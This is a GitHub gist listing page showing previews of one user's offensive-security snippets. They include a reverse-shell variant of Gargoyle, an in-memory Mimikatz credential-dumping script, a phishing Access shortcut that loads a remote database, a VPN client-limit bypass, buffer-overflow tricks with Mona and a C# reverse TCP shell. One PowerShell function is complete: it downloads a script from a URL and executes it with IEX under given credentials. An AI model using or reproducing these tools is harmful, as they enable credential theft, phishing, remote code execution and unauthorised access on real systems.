Skip to content

Instantly share code, notes, and snippets.

aDoN adon90

  • Spain
Block or report user

Report or block adon90

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@adon90
adon90 / setup.nasm
Last active May 18, 2018
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
View setup.nasm
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
@adon90
adon90 / mimikatz.ps1
Last active May 29, 2018
PowerShell Shellcode Injection fix on Win 10 (v1803)
View mimikatz.ps1
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
@adon90
adon90 / Database3.accde
Last active Jul 4, 2018
Phishing Access Macroless .MAM Extension
View Database3.accde
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
@adon90
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}
View powershell_api.txt
"@
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
{
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
@adon90
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
View VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
View Frida
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
You can’t perform that action at this time.